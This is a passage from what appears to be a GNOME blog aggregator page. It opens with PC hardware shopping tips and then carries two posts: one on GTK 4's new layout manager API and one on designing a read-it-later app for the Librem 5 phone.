    • Another price comparison sites I know: Geizhals.eu, I also used Google
    • The Dutch Tweakers.net site allows you to add multiple products and then calculate the cheapest combination of shops including shipping costs (probably only works for .nl, .be). It also gives alternative shop combinations.
    • Fanless NUC cases: Akasa, they also have nice options for motherboards for Intel CPU’s (seems most of those motherboard have a fixed layout).
    • I wanted the pc to be small. My NUC is tiny, the new pc is still huge in comparison. You’re paying a significant premium to have use small components. If you do not go for mini-ITX sized motherboard you can save a lot on the motherboard. Same for the fanless case, it’s also possible to use a quiet CPU cooler (e.g. Noctua NH-L9a-AM4). The fanless case plus PSU and so on was 200 EUR. There’s cases for 40-50 EUR including PSU.

Emmanuele Bassi: Layout managers in GTK 4

Mër, 27/03/2019 - 6:06md

Containers and layout policies have been a staple of GTK’s design since the very beginning. If you wanted your widget to lay out its children according to a specific policy, you had to implement GtkContainer for handling the addition, removal, and iteration of the child widgets, and then you had to implement the size negotiation virtual functions from GtkWidget to measure, position, and size each child.

One of the major themes of the GTK 4 development cycle is to delegate more functionality to ancillary objects instead of encoding it into the base classes provided by GTK. For instance, we moved the event handling from signal handlers described by GtkWidget into event controllers, and rendering is delegated to GtkSnapshot objects. Another step in that direction is decoupling the layout mechanism from GtkWidget itself to an ancillary type, GtkLayoutManager.

Layout Managers

A layout manager is the object responsible for measuring and sizing a widget and its children. Each GtkWidget owns a GtkLayoutManager, and uses it in place of the measure() and allocate() virtual functions—which are going away. The gist of the change: instead of subclassing a GtkWidget to implement its layout policy, you subclass GtkLayoutManager, and then assign the layout manager to a widget.

Just like in the old GtkWidget code, you will need to override a virtual function to measure the layout, called measure(), which replaces the get_preferred_* family of virtual functions of GTK 3:

static void layout_measure (GtkLayoutManager *layout_manager, GtkWidget *widget, GtkOrientation orientation, int for_size, int *minimum, int *natural, int *minimum_baseline, int *natural_baseline)

After measuring, you need to assign the size to the layout; this happens in the allocate() virtual function, which replaces the venerable size_allocate() virtual function of previous GTK major versions:

static void layout_allocate (GtkLayoutManager *layout_manager, GtkWidget *widget, int width, int height, int baseline)

On the more esoteric side, you can also override the get_request_mode() virtual function, which allows you to declare whether the layout manager requests a constant size, or if one of its sizes depend on the opposite one, like height-for-width or width-for-height:

static GtkSizeRequestMode layout_get_request_mode (GtkLayoutManager *layout_manager, GtkWidget *widget)

As you may notice, each virtual function gets passed the layout manager instance, as well as the widget that is using the layout manager.

Of course, this has bigger implications on various aspects of how GTK widgets work, the most obvious being that all the complexity for the layout code can now stay confined into its own object, typically not derivable, whereas the widgets can stay derivable and become simpler.

Another feature of this work is that you can change layout managers at run time, if you want to change the layout policy of a container; you can also have a per-widget layout policy, without adding more complexity to the widget code.

Finally, layout managers allow us to get rid of one of the special cases of GTK, namely: container child properties.

Child properties

Deep in the guts of GtkContainer sits what’s essentially a copy of the GObject property-related code, and whose only job is to implement “child” properties for types deriving from GtkContainer. These container/child properties exist only as long as a child is parented to a specific class of container, and are used for a variety of reasons—but, generally, to control layout options, like the packing direction in boxes and box-like containers; the fixed positioning inside GtkFixed; or the expand/fill rules for notebook tab widgets.

Child properties are hard to use, as they require ad hoc API instead of the usual GObject one, and thus require special casing in GtkBuilder, gtk-doc, and language bindings. Child properties are also attached to the actual direct child of the container, so if a widget interposes a child—like, say, GtkScrolledWindow or GtkListBox do—then you need to keep a reference to that child around in order to change the layout that applies to your own widget.

In GTK’s master branch we got rid of most of them—either by simply removing them when there’s actual widget API that implements the same functionality, or by creating ancillary GObject types and moving child properties to those types. The end goal is to remove all of them, and the relative API from GtkContainer, by the time GTK 4 rolls out. For layout-related properties, GtkLayoutManager provides its own API so that objects are created and destroyed automatically once a child is added to, or removed from, a widget using a layout manager, respectively. The object created is introspectable, and does not require special casing when it comes to documentation or bindings.

You start from deriving your own type from the GtkLayoutChild class, and adding properties just like you would for any other GObject type. Then, you override GtkLayoutManager‘s create_layout_child() virtual function:

static GtkLayoutChild * create_layout_child (GtkLayoutManager *manager, GtkWidget *container, GtkWidget *child) { // The simplest implementation return g_object_new (your_layout_child_get_type (), "layout-manager", manager, "child-widget", child, "some-property", some_property_initial_state, NULL); }

After that, you can access your layout child object as long as a widget is still a child of the container using the layout manager; if the child is removed from its parent, or the container changes the layout manager, the layout child is automatically collected.

New layout managers

Of course, just having the GtkLayoutManager class in GTK would not do us any good. GTK 4 introduces various layout managers for application and widget developers:

  • GtkBinLayout implements the layout policy of GtkBin, with the added twist that it supports multiple children stacked on top of each other, similarly to how GtkOverlay works. You can use each widget’s alignment and expansion properties to control their location within the allocated area, and the GtkBinLayout will always ask for as much space as it’s needed to allocate its largest child.
  • GtkBoxLayout is a straight port of the layout policy implemented by GtkBox; GtkBox itself has been ported to use GtkBoxLayout internally.
  • GtkFixedLayout is a port of the fixed layout positioning policy of GtkFixed and GtkLayout, with the added functionality of letting you define a generic transformation, instead of a pure 2D translation for each child; GtkFixed has been modified to use GtkFixedLayout and use a 2D translation—and GtkLayout has been merged into GtkFixed, as its only distinguishing feature was the implementation of the GtkScrollable interface.
  • GtkCustomLayout is a convenience layout manager that takes functions that used to be GtkWidget virtual function overrides, and it’s mostly meant to be a bridge while porting existing widgets towards the layout manager future.

We are still in the process of implementing GtkGridLayout and make GtkGrid use it internally, following the same pattern as GtkBoxLayout and GtkBox. Other widgets inside GTK will get their own layout managers along the way, but in the meantime they can use GtkCustomLayout.

The final step is to implement a constraint-based layout manager, which would let us create complex, responsive user interfaces without resorting to packing widgets into nested hierarchies. Constraint-based layouts deserve their own blog post, so stay tuned!

Tobias Bernard: Designing for the Librem 5

Mër, 27/03/2019 - 1:53md

So you’re excited about the Librem 5 and GNOME going mobile, and want to start building an app for it. Of course, the first step is to design your app. This can seem quite challenging if you’re just starting out with a new platform, but fear not! In this blog post I’ll walk you through some of the most important UI patterns, and the process of going from idea to mockups step by step. Throughout this I’ll be using a read-it-later app as an example.

The GNOME design philosophy

Before starting to design for a platform, it’s good to familiarize yourself with the design philosophy of the platform. The GNOME Human Interface Guidelines have a “design principles” page which I encourage you to read in its entirety, but will paraphrase a few highlights from here:

Simplicity and Focus — Make sure you have clear goals for your app from the outset, and focus on those. Often it’s better to make a separate application to cover an additional use case rather than cramming too many things into one app (e.g. video podcasts are different enough from audio podcasts to be better off as their own app).

Search and Undo — If there are large amounts of content in your app, provide full-text search to make it easy to find things. Be forgiving about people making mistakes by making it hard to lose data, and never use a warning when you mean undo.

Avoid Preferences — “Just adding an option” often seems like a quick fix, but in most cases you’re just treating symptoms rather than the root cause. It’s better to figure out what that root cause is and fix the problem for everyone, rather than papering over the cracks with a preference. I highly recommend this article by Havoc Pennington on the topic.

Design Process

Now that we’re full of high-minded ideals, let’s jump into the actual design process. Let’s design a great read-it-later app.

We will follow the GNOME design process, which primarily consists of three steps (plus iterations):

  1. Define goals and non-goals for your app
  2. Collect relevant art, i.e. examples of similar apps to borrow ideas from
  3. Make sketches/mockups of the main views and user flows
1. Define Goals

The app we’re designing is going to be a native client for read-it-later web services (such as Pocket). These services allow you to store articles and other web pages that you are interested in, but don’t have time to read right now. That way you can catch up on all the stuff you saved later on, when you have more time. As such, our primary goals are:

  • Listing your saved articles
  • Providing a great, focused experience for reading articles in the app
  • Helping you actually catch up with your reading list
  • Storing articles offline, so they can be read without a network connection

Some non-goals, i.e. things that are out of scope for this application:

  • Social features
  • Content discovery
2. Relevant Art

The next step is to find some examples of existing apps that do similar things. It’s good to look at how other people have solved the same problems, what they do well, and what could be improved before jumping into designing a new app.

So let’s check out the competition:

Pocket on Android (screenshots by me)

Pocket on Android has a lot of features, and a pretty complicated interface. It has lots of categories, social features, a discover section, text-to-speech, and much more. I’ve personally never used most of these features, and they make the app feel quite cluttered. In my experience Pocket is also not very good at helping me get through the list of things I’ve already saved. It feels like it mostly wants me to discover new things to save (and then not read).

Clearly there are some lessons to be learned here for our app.

Instapaper on iOS (screenshots from App Store listing)

I’ve never used the app myself, but judging from screenshots, Instapaper’s UI feels a lot saner and more focused than Pocket. I also really like the rich article previews in the list view and the nice typography.

Wallabag for Android (screenshots from Google Play listing)

Wallabag is a self-hosted alternative to Pocket and Instapaper. This Android client for it (also called Wallabag) is not very sophisticated UI-wise, but it’s a good example of a very simple native client for this kind of service.

Structurally, these apps are all quite similar: a main view with a list of articles, and an article view that just displays the article in a clean, readable format.

Depending on the service, there are multiple lists for different types of articles such as Archive, Highlights, Favorites, Notes, etc. To keep things simple, and because we’re targeting Wallabag first and foremost (since it’s the only self-hosted service), we’re going with only three categories: Unread, Archive, and Favorites.

This means that our application is going to have four main screens we need to design: the three article categories mentioned above plus a reader view, which displays the article content.

3. Sketches/Mockups

Now that we have a basic idea of the structure of the app, we can finally dive into designing the UI. Personally, I like starting off with sketches on paper and then move to Inkscape for more detailed mockups, but you can use any tool you’re familiar with. You don’t need to be good at drawing or a particular application for this, just find a way to visualize your ideas which works for you

If you’re using Inkscape for mockups, you might want to check out the GNOME mockup template which contains some common layouts and patterns to use in your designs. If you are looking for GNOME-style symbolic icons for your mockups, you can find them here, here, and here.

Navigation

When it comes to the layout of an interface, one of the first things to consider is what navigation structure makes the most sense for the type of content you have.

The most common navigation patterns in GNOME apps are the Stack, the View Switcher, and the Sidebar List.

Example of Stack navigation in GNOME Photos

The Stack pattern is when you have completely separate views with no shared UI, and a back button to go back to the overview. This is what Photos does for navigating between the stream of photos and the detailed view of an individual photo, for example. There is a bit more friction to switch between views than with other patterns, but it’s also more focused. This pattern is great for situations where you don’t switch between views a lot.

View switcher in GNOME Clocks

The View Switcher is for cases where there are a small number of views that are equally important or need to always be easily accessible. It’s used in GNOME apps such as Clocks, Music, and Software as the primary navigation. On the desktop, this switcher is always in the headerbar, but there’s work on a new adaptive version of it, which moves to the bottom of the screen for mobile. This is not quite ready yet, but will hit a version of Libhandy near you soon.

Sidebar List in Fractal

The Sidebar List is for cases where there are a lot of views that you need to switch between often. For example, it’s used in Fractal for the room list, because it gives an overview of all rooms and allows for quick context switching. Of course, on mobile there’s not enough space for a content pane and a sidebar, so there is a Libhandy widget called Leaflet, which transforms from a Sidebar List on desktop to a Stack on mobile.

Experimental branch of GNOME Settings using HdyLeaflet to switch between Sidebar List and Stack navigation

For our read-it-later app, we need navigation to switch between the different lists (Unread, Archive, Favorites), and to switch between list and article views.

The former is a small set of views that we want to be easily accessible, so a view switcher is a good fit. Since we can’t use the shiny new adaptive view switcher widget yet, we can use a plain old view switcher in the header bar for now (though we can already design the UI with the new switcher in mind).

For the latter we could either use a stack or a sidebar list (using the Leaflet widget so it works on mobile). Since we want this app to be a focused reading experience and switching back and forth quickly between articles is not a very common use case, a Stack is probably the best solution here.

This means that our main screens will look something like this:

Quick pencil sketch of the layout for the list and article screens Article List Screens

Now that we have a basic navigation structure we can design the individual screens in more detail. The three article list screens are basically the same lists with different content.

The main purpose of these screens is to provide a nice, legible list of the saved articles that entices people to catch up with their reading list. In order to do this we’re going with a comfortable layout including article title, preview, and some information about the article.

To help people catch up with their saved articles, we should also try to make the content as interesting as possible. A simple reverse-chronological list of saved items is quite boring, and I’ve noticed in my own use that I often scroll down the list randomly to discover older articles. A potential way to build this into the core experience would be to show the reading list in randomized order, and show the most recently saved articles at the top in a separate category. I’ve tried that in the mockups below.

Mockups of the Unread, Archive and Favorites screens (the latter two are structurally identical, though of course in the real app they’d have different content)

In terms of actions, we need to expose search and selection mode (for operations on multiple elements), as well as the application’s primary menu. The primary menu contains global app-level things such as Help, Preferences, and About.

In selection mode we need the ability to move articles to Favorites and Archive, and delete them from our reading list. Since this is not essential functionality though, we won’t be doing designs for it yet. If you want to learn more, have a look at the selection mode page in the GNOME HIG. The same goes for search (relevant HIG page).

Article Screen

The article screen’s job is pretty straightforward: provide a great reading experience for the saved articles. Since many websites kind of suck in this regard, a reader mode (like Epiphany and Firefox have) should be the default view whenever possible. However, since there’s no guarantee that a given article will be rendered perfectly, we need some way to show to the website with its native styling when necessary.

We also need a way to move an article to Favorites and Archive, delete it, and share it. The most important actions are usually exposed directly in the header bar, but for less important actions (or if there’s not enough space), we can use a secondary menu.

Mockup of the article screen Desktop

We now know more or less what the app looks like on mobile, but what about the desktop? As with responsive web design, if you design your app for mobile first, it’s usually pretty easy to make it work well on larger screens too.

In this case, since we don’t have any sidebars or other complicated layout elements, the main change happening at larger sizes is that the content column width grows with the window, until it reaches a maximum width comfortable for reading. This can be implemented by wrapping the content area in an HdyColumn. The view switcher also moves up to the header bar, and there is a close button on the right side.

Desktop mockups of some screens There’s more…

What we now have is the basic structure and most important screens of the application, but that’s of course far from everything. We don’t yet have designs for login and account settings, empty states, first run experience, errors, search, and a number of other things. I wanted to stick to the basics for this post, but perhaps I could expand on these things in future blog posts if there’s interest.

It’s also worth noting that mockups are never final, and interfaces almost always change during implementation, as you learn more about use cases, the underlying technology, and other constraints. Ideally you’d also do some informal user testing on real people, and get feedback on the design that way.

I hope this has been useful as an introduction to designing apps for the Librem 5 (and GNOME more generally). If you have any questions feel free to drop by on #gnome-design on IRC/Matrix or the Librem 5 apps Matrix room (#community-librem-apps:talk.puri.sm).

If you want to play with the mockups I made for this tutorial, here’s the source SVG.